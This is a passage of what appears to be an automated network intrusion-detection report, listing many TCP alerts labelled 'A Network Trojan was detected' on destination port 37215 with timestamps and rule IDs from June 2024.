                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776069
                SID:2829579
                Source Port:59624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762384
                SID:2835222
                Source Port:54106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179937
                SID:2829579
                Source Port:56992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763022
                SID:2835222
                Source Port:38868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725671
                SID:2835222
                Source Port:51120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.941682
                SID:2835222
                Source Port:34338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967741
                SID:2835222
                Source Port:46072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.940848
                SID:2829579
                Source Port:45172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661855
                SID:2835222
                Source Port:45438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.341576
                SID:2835222
                Source Port:50342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978258
                SID:2829579
                Source Port:33070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701029
                SID:2835222
                Source Port:50946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149141
                SID:2829579
                Source Port:47796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.148184
                SID:2829579
                Source Port:40870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.450824
                SID:2829579
                Source Port:52914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322900
                SID:2829579
                Source Port:43128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074058
                SID:2835222
                Source Port:58430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546496
                SID:2835222
                Source Port:47788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.705370
                SID:2835222
                Source Port:48952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323167
                SID:2829579
                Source Port:54056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683290
                SID:2835222
                Source Port:39610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014423
                SID:2835222
                Source Port:48448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186589
                SID:2829579
                Source Port:46346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001983
                SID:2835222
                Source Port:50112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848365
                SID:2829579
                Source Port:50244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504712
                SID:2829579
                Source Port:57884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850352
                SID:2835222
                Source Port:43160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024022
                SID:2835222
                Source Port:52690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410149
                SID:2829579
                Source Port:54022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766958
                SID:2835222
                Source Port:48862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804095
                SID:2829579
                Source Port:42004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132271
                SID:2835222
                Source Port:34112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978493
                SID:2835222
                Source Port:53270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850271
                SID:2835222
                Source Port:46208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971616
                SID:2835222
                Source Port:51914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967422
                SID:2829579
                Source Port:37582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.015058
                SID:2829579
                Source Port:33658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.181634
                SID:2835222
                Source Port:59944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228225
                SID:2829579
                Source Port:46150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501211
                SID:2829579
                Source Port:38908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.803728
                SID:2829579
                Source Port:44026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663579
                SID:2829579
                Source Port:35074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677769
                SID:2835222
                Source Port:54864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546104
                SID:2835222
                Source Port:44132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.087800
                SID:2829579
                Source Port:43868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470007
                SID:2829579
                Source Port:49748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.542973
                SID:2829579
                Source Port:56920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.667800
                SID:2829579
                Source Port:56822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717410
                SID:2829579
                Source Port:57636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.719126
                SID:2835222
                Source Port:44258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072542
                SID:2835222
                Source Port:41184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021402
                SID:2829579
                Source Port:46740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029213
                SID:2829579
                Source Port:37772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014173
                SID:2835222
                Source Port:38166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.336892
                SID:2835222
                Source Port:38030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519308
                SID:2829579
                Source Port:59876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453792
                SID:2835222
                Source Port:44002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182874
                SID:2829579
                Source Port:46164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131575
                SID:2829579
                Source Port:38820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148309
                SID:2829579
                Source Port:52666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149174
                SID:2835222
                Source Port:39392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032300
                SID:2835222
                Source Port:38272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291315
                SID:2829579
                Source Port:45096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761268
                SID:2829579
                Source Port:53798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028940
                SID:2835222
                Source Port:54820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967706
                SID:2835222
                Source Port:58328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023501
                SID:2835222
                Source Port:39418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054273
                SID:2835222
                Source Port:60118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152760
                SID:2835222
                Source Port:53940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.642892
                SID:2835222
                Source Port:60600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.015199
                SID:2829579
                Source Port:36130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133072
                SID:2835222
                Source Port:58872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228965
                SID:2835222
                Source Port:47882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979805
                SID:2829579
                Source Port:59382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383991
                SID:2835222
                Source Port:43678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732188
                SID:2829579
                Source Port:59264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200819
                SID:2835222
                Source Port:58822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290089
                SID:2835222
                Source Port:43644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.425058
                SID:2829579
                Source Port:35664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805206
                SID:2835222
                Source Port:41300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806371
                SID:2829579
                Source Port:35492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977829
                SID:2829579
                Source Port:36498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.898219
                SID:2829579
                Source Port:51492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503908
                SID:2829579
                Source Port:47336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322679
                SID:2835222
                Source Port:55866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969202
                SID:2829579
                Source Port:53050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989703
                SID:2829579
                Source Port:40792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.015084
                SID:2829579
                Source Port:37374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848287
                SID:2829579
                Source Port:46600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183757
                SID:2835222
                Source Port:42522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762848
                SID:2835222
                Source Port:43348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776719
                SID:2829579
                Source Port:40748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518024
                SID:2835222
                Source Port:56424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733510
                SID:2829579
                Source Port:38438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.000724
                SID:2835222
                Source Port:57568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829057
                SID:2829579
                Source Port:45852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790344
                SID:2829579
                Source Port:54418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186468
                SID:2829579
                Source Port:44450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.882292
                SID:2829579
                Source Port:49908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343039
                SID:2835222
                Source Port:54574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662755
                SID:2835222
                Source Port:47582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916849
                SID:2835222
                Source Port:58854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018177
                SID:2829579
                Source Port:46958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917401
                SID:2835222
                Source Port:59862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022812
                SID:2829579
                Source Port:57094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.673161
                SID:2829579
                Source Port:44144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.847803
                SID:2829579
                Source Port:50932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943529
                SID:2829579
                Source Port:45794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.112320
                SID:2835222
                Source Port:50818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054474
                SID:2835222
                Source Port:43694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.969817
                SID:2829579
                Source Port:48392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149964
                SID:2829579
                Source Port:54770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.857974
                SID:2829579
                Source Port:54228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183983
                SID:2835222
                Source Port:46170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381538
                SID:2835222
                Source Port:50278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342366
                SID:2835222
                Source Port:55816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180666
                SID:2829579
                Source Port:46108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.016156
                SID:2835222
                Source Port:60526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133291
                SID:2829579
                Source Port:60646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944188
                SID:2835222
                Source Port:41024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150490
                SID:2829579
                Source Port:58308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340764
                SID:2829579
                Source Port:43282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.737758
                SID:2829579
                Source Port:50188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.968191
                SID:2835222
                Source Port:60734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019061
                SID:2829579
                Source Port:51600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021180
                SID:2829579
                Source Port:39228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.543141
                SID:2835222
                Source Port:51778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.505222
                SID:2829579
                Source Port:49130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152028
                SID:2835222
                Source Port:41880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763700
                SID:2835222
                Source Port:33748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941229
                SID:2835222
                Source Port:44844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274062
                SID:2835222
                Source Port:44248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848784
                SID:2835222
                Source Port:57996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.772265
                SID:2835222
                Source Port:41272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717484
                SID:2835222
                Source Port:59228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.224955
                SID:2829579
                Source Port:43266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.942517
                SID:2835222
                Source Port:60284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185234
                SID:2835222
                Source Port:32934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805185
                SID:2829579
                Source Port:51116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295667
                SID:2829579
                Source Port:54592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.409526
                SID:2835222
                Source Port:38104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662326
                SID:2829579
                Source Port:57648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.862379
                SID:2835222
                Source Port:39098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410734
                SID:2829579
                Source Port:44070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.580872
                SID:2835222
                Source Port:46398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545782
                SID:2829579
                Source Port:44402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410567
                SID:2829579
                Source Port:46720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.338143
                SID:2829579
                Source Port:54344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776498
                SID:2829579
                Source Port:41002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878204
                SID:2829579
                Source Port:53780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340505
                SID:2829579
                Source Port:37886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502851
                SID:2829579
                Source Port:46696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275662
                SID:2835222
                Source Port:53650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133860
                SID:2829579
                Source Port:55662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.161572
                SID:2829579
                Source Port:35674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.990388
                SID:2835222
                Source Port:55956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290546
                SID:2829579
                Source Port:49124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966326
                SID:2829579
                Source Port:44440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.148861
                SID:2835222
                Source Port:46120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184566
                SID:2829579
                Source Port:49976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979206
                SID:2835222
                Source Port:43758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452919
                SID:2829579
                Source Port:34914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.289053
                SID:2829579
                Source Port:46058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.337203
                SID:2829579
                Source Port:48432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790121
                SID:2829579
                Source Port:45846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.521739
                SID:2835222
                Source Port:55366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.862029
                SID:2829579
                Source Port:58416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967797
                SID:2829579
                Source Port:33004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.242608
                SID:2829579
                Source Port:36900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716242
                SID:2835222
                Source Port:60422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230804
                SID:2829579
                Source Port:56394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.422844
                SID:2829579
                Source Port:41822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452610
                SID:2835222
                Source Port:56144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716998
                SID:2835222
                Source Port:51552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519744
                SID:2829579
                Source Port:45400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662561
                SID:2835222
                Source Port:58950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.615208
                SID:2829579
                Source Port:56626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660337
                SID:2835222
                Source Port:41766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184859
                SID:2829579
                Source Port:43024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681352
                SID:2835222
                Source Port:37558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183539
                SID:2829579
                Source Port:38152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.700678
                SID:2835222
                Source Port:46540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861620
                SID:2835222
                Source Port:43498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703408
                SID:2829579
                Source Port:53002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704378
                SID:2829579
                Source Port:52782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146437
                SID:2835222
                Source Port:36870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669949
                SID:2835222
                Source Port:41700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.198483
                SID:2829579
                Source Port:34336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.337163
                SID:2829579
                Source Port:34478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.543630
                SID:2835222
                Source Port:54582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519886
                SID:2829579
                Source Port:50150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791847
                SID:2835222
                Source Port:55064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.422951
                SID:2829579
                Source Port:38794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.409303
                SID:2829579
                Source Port:51654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684321
                SID:2835222
                Source Port:42446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152837
                SID:2835222
                Source Port:49866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.010099
                SID:2829579
                Source Port:58832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
